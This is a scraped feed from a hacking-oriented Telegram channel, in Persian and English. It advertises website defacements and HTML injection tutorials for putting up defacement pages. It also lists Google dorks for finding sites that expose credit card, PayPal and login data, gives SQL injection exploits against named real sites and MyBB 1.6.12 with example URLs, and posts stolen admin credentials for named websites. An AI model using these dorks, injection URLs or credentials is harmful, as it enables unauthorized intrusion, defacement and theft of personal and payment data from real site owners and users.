Forwarded from Deleted Account
This media is not supported in your browser
VIEW IN TELEGRAM
#Exploiting - #HTMLInjection(GET) - #Bug
اموزش باگ HTMLInjection و اکسپلویت کردن ان توسط JAVASCRIPT
dl link : yon.ir/nuTUy
T.me/LearnExploit
اموزش باگ HTMLInjection و اکسپلویت کردن ان توسط JAVASCRIPT
dl link : yon.ir/nuTUy
T.me/LearnExploit
👍1
Forwarded from عکس نگار
#Exploiting - #HTMLInjection(Post) - #Bug
———-
در این اموزش یاد میگیرید که چطور با استفاده از باگ HTML Injection - Reflected (POST) صفحه ی دیفیس خودتون رو در سایت ظاهر کنید.
Part 1 : t.me/LearnExploit/317
dl link : yon.ir/aBK4n
———-
T.me/LearnExploit
———-
در این اموزش یاد میگیرید که چطور با استفاده از باگ HTML Injection - Reflected (POST) صفحه ی دیفیس خودتون رو در سایت ظاهر کنید.
Part 1 : t.me/LearnExploit/317
dl link : yon.ir/aBK4n
———-
T.me/LearnExploit
Forwarded from Deleted Account
Media is too big
VIEW IN TELEGRAM
هرچی شکارچی گرسنه تر باشه هدفش برای شکار کوچیکتره. بقا انگیزست، هدف نیست.
✅بدون کار رو کی و چطور شروع میکنی و کی و چطور تموم میکنی. قطع کردن ناگهانی یک فرایند اشتباه بزرگیه مثل خوابوندن بچه با باتوم به جای لالایی، یا بدتر قطع کردن برق کامپیوتر به جای خاموش کردنش.
#انگیزشی
🆔 @LearnExploit
✅بدون کار رو کی و چطور شروع میکنی و کی و چطور تموم میکنی. قطع کردن ناگهانی یک فرایند اشتباه بزرگیه مثل خوابوندن بچه با باتوم به جای لالایی، یا بدتر قطع کردن برق کامپیوتر به جای خاموش کردنش.
#انگیزشی
🆔 @LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695439/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695439/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695437/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695437/
—
@LearnExploit
Forwarded from اتچ بات
#New #Priv8 #Dork (2018)
[+] #Credit Card
[+] #Paypal
/////////////
intext:"bri".php?id= intext:"Credit Card" site:.com
intext:"kartu kredit".php?id= intext:"Username" site:.com
intext:"bayar dengan kartu kredit".php?id= intext:"Password" site:.com
intitle:"bayar dengan kartu kredit".php?id= titleConfusedhop intext:"Credit Card" site:.com
intitle:"human".php?id= title:education intext:"Username" site:.com
intitle:"Publications".php?id= title:login intext:"Password" site:.com
intitle:"project".php?id= title:join intext:"Username" site:.com
intitle:"trade".php?id= title:orders intext:"Username" site:.com
intitle:"commodity".php?id= title:join intext:"Username" site:.com
intitle:"promotion".php?id= title:news intext:"Email+Password" site:.com
intitle:"center".php?id= title:join intext:"Credit Card" site:.com
intitle:"community".php?id= title:join intext:"Email+Password" site:.com
intitle:"marketing".php?id= title:join intext:"Credit Card" site:.com
intitle:"membership".php?id= title:info intext:"Username" site:.com
intitle:"mountaineer".php?id= title:join intext:"Credit Card" site:.com
intitle:"bike".php?id= title:payment intext:"Credit Card" site:.com
intitle:"management".php?id= title:business intext:"Username" site:.com
intitle:"insurance".php?id= title:join intext:"Credit Card" site:.com
inurl:business.php?cid= title:join intext:"Username" site:.com
intitle:"company".php?id= titleConfusedign in intext:"Email+Password" site:.com
intitle:"store".php?id= title:cart intext:"Credit Card" site:.com
intitle:"career".php?lang=en title:join intext:"Credit Card" site:.com
intitle:"jobs".php?lang=en intext:business intext:"Email+Password" site:.com
inurl:client.php?id= title:login intext:"Username" site:.com
//////////////////
T.me/LearnExploit
[+] #Credit Card
[+] #Paypal
/////////////
intext:"bri".php?id= intext:"Credit Card" site:.com
intext:"kartu kredit".php?id= intext:"Username" site:.com
intext:"bayar dengan kartu kredit".php?id= intext:"Password" site:.com
intitle:"bayar dengan kartu kredit".php?id= titleConfusedhop intext:"Credit Card" site:.com
intitle:"human".php?id= title:education intext:"Username" site:.com
intitle:"Publications".php?id= title:login intext:"Password" site:.com
intitle:"project".php?id= title:join intext:"Username" site:.com
intitle:"trade".php?id= title:orders intext:"Username" site:.com
intitle:"commodity".php?id= title:join intext:"Username" site:.com
intitle:"promotion".php?id= title:news intext:"Email+Password" site:.com
intitle:"center".php?id= title:join intext:"Credit Card" site:.com
intitle:"community".php?id= title:join intext:"Email+Password" site:.com
intitle:"marketing".php?id= title:join intext:"Credit Card" site:.com
intitle:"membership".php?id= title:info intext:"Username" site:.com
intitle:"mountaineer".php?id= title:join intext:"Credit Card" site:.com
intitle:"bike".php?id= title:payment intext:"Credit Card" site:.com
intitle:"management".php?id= title:business intext:"Username" site:.com
intitle:"insurance".php?id= title:join intext:"Credit Card" site:.com
inurl:business.php?cid= title:join intext:"Username" site:.com
intitle:"company".php?id= titleConfusedign in intext:"Email+Password" site:.com
intitle:"store".php?id= title:cart intext:"Credit Card" site:.com
intitle:"career".php?lang=en title:join intext:"Credit Card" site:.com
intitle:"jobs".php?lang=en intext:business intext:"Email+Password" site:.com
inurl:client.php?id= title:login intext:"Username" site:.com
//////////////////
T.me/LearnExploit
Telegram
😁1
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695478/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695478/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695477/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695477/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695476/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695476/
—
@LearnExploit
#Dork - Get user and pass of the sites...! : )
"login" intext:"password" | "passcode" filetype:txt
==================
@LearnExploit
"login" intext:"password" | "passcode" filetype:txt
==================
@LearnExploit
#Exploit - #Dork - #Israel new 2018
#######################################
# Exploit Title : Designed By Studio Octavo Israel SQL Injection Vulnerability
######################################
# Google Dork : intext:''Designed By Studio Octavo'' site:il
# Exploits :
/content.asp?id=[SQL Inj]
/info.asp?id=[SQL Inj]
#######################################
# Example Site =>
# SQL Database Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id = 9''.
/content.asp, line 5
#######################################
# T.me/LearnExploit - 0Day.Today Boy's
#######################################
#######################################
# Exploit Title : Designed By Studio Octavo Israel SQL Injection Vulnerability
######################################
# Google Dork : intext:''Designed By Studio Octavo'' site:il
# Exploits :
/content.asp?id=[SQL Inj]
/info.asp?id=[SQL Inj]
#######################################
# Example Site =>
sy-ccc.co.il/content.asp?id=9%27
=> [ Proof of Concept ] => archive.is/BEuse
# SQL Database Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id = 9''.
/content.asp, line 5
#######################################
# T.me/LearnExploit - 0Day.Today Boy's
#######################################
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Exploit - #Dork - #MYBB
——————————-
[+] Exploit Name: MYBB 1.6.12 search.php Sql injection
[+] Google Dork : intext:"powered by Mybb"
[+] Version: 1.6.12
اسیب پذیری sql در MYBB 1.6.12
——————————-
|~Exploit :
بخش زیر رو به URL سایت اضافه کنید.
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
|~Error :
Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19
-1~dotdeb.1 (Linux)
|~Exm :
***************************************************
[+] How To patch :
فایل search.php رو باز کنید و قسمت زیر رو پیدا کنید:
$sid = $db->escape_string($mybb->input['sid']);
و به کد زیر تغییر دهید :
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
=======================================
T.me/LearnExploit
0Day.Today Boy's
——————————-
[+] Exploit Name: MYBB 1.6.12 search.php Sql injection
[+] Google Dork : intext:"powered by Mybb"
[+] Version: 1.6.12
اسیب پذیری sql در MYBB 1.6.12
——————————-
|~Exploit :
بخش زیر رو به URL سایت اضافه کنید.
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
|~Demo :http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
|~Error :
Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19
-1~dotdeb.1 (Linux)
|~Exm :
1) http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
2) http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
3) http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
***************************************************
[+] How To patch :
فایل search.php رو باز کنید و قسمت زیر رو پیدا کنید:
$sid = $db->escape_string($mybb->input['sid']);
و به کد زیر تغییر دهید :
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
=======================================
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Forwarded from اتچ بات
دو فایل MYBB از دو سایت هکری :)
کافیه admin رو سرچ کنید
Special Tnx to DARKDAYS
============
@LearnExploit
کافیه admin رو سرچ کنید
Special Tnx to DARKDAYS
============
@LearnExploit
Telegram
#Target ::: #User ::: #Pass
Target :
admin : A.f0Kvdiyy8q2
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
============
@LearnExploit
Target :
http://wagsrescue.org
User & Pass :admin : A.f0Kvdiyy8q2
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
============
@LearnExploit
#Target ::: #User ::: #Pass
Target :
User & Pass :
admin : /jkfgw0oh8SPc
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
tom : MiIT3htHGE74E
============
@LearnExploit
Target :
http://www.lideranca.org
User & Pass :
admin : /jkfgw0oh8SPc
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
tom : MiIT3htHGE74E
============
@LearnExploit